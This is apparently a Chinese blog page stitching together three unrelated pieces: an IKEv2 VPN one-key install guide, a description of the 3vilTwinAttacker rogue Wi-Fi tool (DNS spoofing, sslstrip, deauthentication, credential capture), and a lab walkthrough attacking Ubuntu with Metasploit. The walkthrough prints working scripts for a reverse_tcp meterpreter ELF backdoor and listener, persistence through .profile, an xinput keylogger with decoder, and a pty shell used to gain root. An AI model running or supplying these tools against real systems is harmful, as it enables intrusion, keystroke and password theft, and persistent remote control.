用法很简单：

总结成一句话就是：除了类型要选对以外，其他的一路回车就好了23333

具体如下：
1.下载脚本:

wget https://raw.githubusercontent.com/quericy/one-key-ikev2-vpn/master/one-key-ikev2.sh

2.运行(如果有需要使用自己已有的根证书，请将私钥命名为ca.cert，将根证书命名为ca.cert.pem，放到脚本的相同目录下再运行该脚本，没有证书的话将自动生成自签名证书咯)：

chmod +x one-key-ikev2.sh
bash one-key-ikev2.sh

3.等待自动配置部分内容后，选择vps类型（OpenVZ还是Xen、KVM），选错将无法成功连接，请务必核实服务器的类型。输入服务器ip或者绑定的域名(连接vpn时服务器地址将需要与此保持一致)，以及证书的相关信息(C,O,CN)，使用自己的根证书的话，C,O,CN的值需要与根证书一致，为空将使用默认值(default value)，确认无误后按任意键继续

4.输入两次pkcs12证书的密码(可以为空)

5.看到install success字样即表示安装成功。默认用户名密码将以黄字显示，可根据提示自行修改文件中的用户名密码。(WindowsPhone8.1的用户请将用户名myUserNames修改为%any ,否则可能会由于域的问题无法连接，具体参见这篇文章中的说明)

6.将提示信息中的证书文件ca.cert.pem拷贝到客户端，修改后缀名为.cer后导入。ios设备使用Ikev1无需导入证书，而是需要在连接时输入共享密钥，共享密钥即是提示信息中的黄字PSK.

PS:

服务器重启后默认ipsec不会自启动，请自行添加，或使用命令手动开启：

连上服务器后无法链接外网：

修改net.ipv4.ip_forward=1后保存并关闭文件 然后使用以下指令刷新sysctl：

如遇报错信息，请重新打开/etc/syctl并将报错的那些代码用#号注释，保存后再刷新sysctl直至不会报错为止。

PS2:

如需Debian系统的IKEV2一键安装脚本，可参考magic282童鞋的一键脚本：
https://github.com/magic282/One-Key-L2TP-IKEV2-Setup

PS3:

原文地址：https://quericy.me/blog/699

免责声明：本站提供安全工具、程序(方法)可能带有攻击性，仅供安全研究与教学之用，风险自负!

3vilTwinAttacker可以帮助渗透测试人员建立一个虚假的钓鱼WiFi，表面上这是一个提供上网服务的正常AP（网络接入点），而实际上它却在不知不觉嗅探获取网络流量。

软件依赖

推荐使用Kali linux
Ettercap
Sslstrip
Airbase-ng（包含于aircrack-ng）
DHCP
Nmap

DHCP安装（Debian）

Ubuntu 
$ sudo apt-get install isc-dhcp-server

Kali linux

$ echo "deb http://ftp.de.debian.org/debian wheezy main " >> /etc/apt/sources.list
$ apt-get update && apt-get install isc-dhcp-server

DHCP安装（RedHat）

Fedora

$ sudo yum install dhcp

工具选项

Etter.dns: Edit etter.dns to loading module dns spoof.
Dns Spoof: Start dns spoof attack in interface ath0 fake AP.
Ettercap: Start ettercap attack in host connected AP fake Capturing login credentials.
Sslstrip: The sslstrip listen the traffic on port 10000.
Driftnet: The driftnet sniffs and decodes any JPEG TCP sessions, then displays in an window.
Deauth Attack: kill all devices connected in AP (wireless network) or the attacker can Also put the Mac-address in the Client field, Then only one client disconnects the access point.
Probe Request: Probe request capture the clients trying to connect to AP,Probe requests can be sent by anyone with a legitimate Media Access Control (MAC) address, as association to the network is not required at this stage.
Mac Changer: you can now easily spoof the MAC address. With a few clicks, users will be able to change their MAC addresses.
Device FingerPrint: list devices connected the network mini fingerprint, is information collected about a local computing device.

视频演示

原版（需要梯子，本博客提供，请搜索）：http://www.youtube.com/watch?v=Jrb43KVPIJw 

国内通道：http://v.youku.com/v_show/id_XOTE4NDM1NDcy/v.swf.html 

下载地址：github

这篇文章写来主要是一次娱乐性的练习。共享出攻击的细节，其中包括一些经过原作者修改过的各种来源的脚本文件。渗透的过程不是重点，之所以发出来最大的原因主要是文章后半部分维持持久化攻击的一些地方还是很值得学习的，顺便大家也可以再次熟悉一下MSF框架。希望对大家有所帮助。

攻击环境：

Ubuntu12.04LTS 32bit（靶机，默认的软件安装配置）
VirtualBox
Metasploit framework（最新版）
Debian Squeeze 64bit （攻击机）

首先，我们先准备一个简单的二进制ELF可执行文件生成器的bash脚本，这样后续工作就可以轻松很多。然后将脚本放在Metasploit的主目录下：

#!/bin/bash clear
echo"************************************************" echo " LINUX ELF BINARY GENERATOR FOR METASPLOIT    *" echo"************************************************" echo -e "What IP are we gonna use  ex. 192.168.0.1?  \c" read IP
echo -e "What Port Number are we gonnalisten to? : \c" read port ./msfpayloadlinux/x86/meterpreter/reverse_tcp LHOST=$IP LPORT=$port R| ./msfencode -t elf-e x86/shikata_ga_nai >> Executive echo "Executive binarygenerated.." chmod u=rwx Executive ls -la Executive

运行脚本之后进行简单的配置之后我们就有了一个名为Executive的二进制可执行文件。

接下来需要我们在攻击机上启动一个监听来等待靶机主动连上来，因为我们这里使用了全球流行的reverse后门哇咔咔！为了工作更加简（zhuang）单（bi），我这里又写了一个bash，然后将bash文件也放在Metasploit的主目录下面：

#!/bin/bash clear
echo"*********************************************" echo "   METASPLOIT LINUX METERPRETER LISTENER    *" echo"*********************************************" echo "Here is a network device listavailable on yor machine" cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d' echo -e "What network interface are wegonna use ?  \c" read interface
echo -e "What Port Number are we gonnalisten to? : \c" read port # Get OS name OS=`uname` IO="" # store IP case $OS in   Linux) IP=`/sbin/ifconfig $interface | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print$1}'`;;    *)IP="Unknown";; esac echo "      starting the meterpreter listener.." ./msfcli exploit/multi/handler  PAYLOAD=linux/x86/meterpreter/reverse_tcp  LHOST=$IP LPORT=$port  E

好了，监听生成结束，然后就需要我们使用各种猥琐的方式将后门木马转给Ubuntu靶机执行。因为这里是练习，所以我们直接将ELF文件放在受害机中执行                         此处有图胜有声

现在我们就已经在靶机上成功执行了这个“未知”的二进制文件。当我们双击这个文件时没有任何反应（所以这个时候后门注入才是王道），不过我们的攻击机上的监听已经有了结果：

然后呢？我们现在有了一个meterpreter shell，不过应该怎样获取到root权限呢？接下来的工作才是最有趣的部分：接下来，我们将在靶机的home中放一个后门文件，并通过修改.profile文件做到每次靶机启动的时候都会执行我们的后门。为了做到这步，我们首先需要下载靶机的.profile文件：

我们在文件中加了一点点内容以保证每次登录都能成功执行我们的后门文件，这里加的是./executive（用的就是生成的后门文件名，这里我们可以起一些诱惑性大的名字比如sys.conf之类的，但是要保证文件具有可执行+x权限）

然后我们将修改后的.profile文件传回靶机

接着我们上传我们的ELF二进制可执行文件到靶机的home目录里面，并改名为executive同时要保证文件具有RWX属性

那么现在我们就获得了一个简单的持久性后门，每次靶机开机我们这边就可以获得一个上线shell，并且文件时静默执行不含任何防腐剂的。

好的，第一步持久化我们已经完成了，接下来我们做点什么呢？

键盘记录

Ubuntu自带xinput所以我们可以利用这个做一个键盘记录keylogger记录靶机在X界面下的一些按键输入。同时这里作者又写了一bash脚本（……）：

#!/bin/bash export DISPLAY=:0.0 xinput list
echo -e "KBD ID ?" read kbd
xmodmap -pke > /tmp/.xkey.log
script -c "xinput test $kbd" |cat >> /tmp/.xkey.log & echo "The keylog can be downloadedfrom /tmp/.xkey.log" echo "Use the meterpreter downloadfunction" echo "Press CTLR+C to exit thissession, keylogger will run in backround"

写完之后我们将脚本放在靶机中然后执行。当然最好也来个登录启动。

启动之后我们还需要手工找到键盘的KBD ID，然后输入，这里是10

然后让脚本去识别一下。脚本记录的log文件默认是放在/tmp文件夹下的，一段时间之后，我们下载下来分析一下。

这个脚本的生成的内容地球人是看不懂的，所以我们将log文件down下来之后还需要进行接下来的处理，这里作者写了一个bash文件生成了一个python脚本来解码这段天书log（…），下面是解码的bash脚本：

#!/bin/sh cat .xkey.log | grep keycode >xmodmap.pke
cat .xkey.log | grep 'key p' > xlog
rm -f .xkey.log #Generating some Python to do the decoding echo 'import re, collections, sys' >decoder.py
echo 'from subprocess import *' >>decoder.py
echo 'def keyMap():' >> decoder.py
echo '  table = open("xmodmap.pke")' >> decoder.py
echo '  key = []' >> decoder.py
echo '  for line in table:' >> decoder.py
echo "      m = re.match('keycoded+) = (.+)',line.decode())" >> decoder.py
echo '     if m and m.groups()[1]:' >> decoder.py
echo '        key.append(m.groups()[1].split()[0]+"_____"+m.groups()[0])'>> decoder.py
echo '  return key' >> decoder.py
echo 'def printV(letter):' >>decoder.py
echo '     key=keyMap();' >> decoder.py
echo '     for i in key:' >> decoder.py
echo '              if str(letter) ==i.split("_____")[1]:' >> decoder.py
echo '                     return i.split("_____")[0]'>> decoder.py
echo '     return letter' >> decoder.py
echo 'if len(sys.argv) < 2:' >>decoder.py
echo '        print "Usage: %s FILE" %sys.argv[0];' >> decoder.py
echo '        exit();' >> decoder.py
echo 'else:' >> decoder.py
echo '        f = open(sys.argv[1])' >>decoder.py
echo '        lines = f.readlines()' >>decoder.py
echo '        f.close()' >> decoder.py
echo '        for line in lines:' >> decoder.py
echo "                m = re.match('keyss +(\d+)',line)" >> decoder.py
echo '                if m:' >> decoder.py
echo '                          keycode =m.groups()[0]' >> decoder.py
echo '                          print(printV(keycode))' >> decoder.py
 
echo 'Please see LOG-keylogger for theoutput......' python decoder.py xlog > LOG
sed ':a;N;$!ba;s/\n/ /g' LOG >LOG-keylogger
rm -f LOG
rm -f xmodmap.pke
rm -f decoder.py
rm -f xlog
cat LOG-keylogger

现在我们运行一下这个bash脚本，我们就可以看到效果了：

好，keylogger也搞完了接下来就是怎么样获取到root权限了。

获取root权限

在这里，我们从以上的keylogger中获取到了root密码，但是当我们直接输入sudo su获取root的时候却遇到了无法返回响应的情况：

这里有一个绕过的好方法，就是利用自带的python来获取一个交互式的shell从而可以让我们获取root权限

python -c “import pty;pty.spawn(‘/bin/bash’)”

这样我们sudo su的时候就可以输入root密码了，然后成功获取到了一个root级别的shell，整个过程就完满完成了。

后记

CentOS, Debian Squeeze等有些系统默认是不带xinput的所以keylogger的部分就没办法完成了。

另外，要想防止这个键盘记录其实也很简单，只要去掉xinput的可执行权限就可以了

chmod a-x /path/to/xinput

当然，即便是目标机器上没有自带xinput那难道就会难倒我们么？拜托我们都已经有了meterpreter shell了好么。

最后附上作者做的良心的视频Demo（已搬回墙内，不谢！）：

百度网盘下载/观看：

链接:  http://pan.baidu.com/s/1eQIkbQy    提取码:  m37p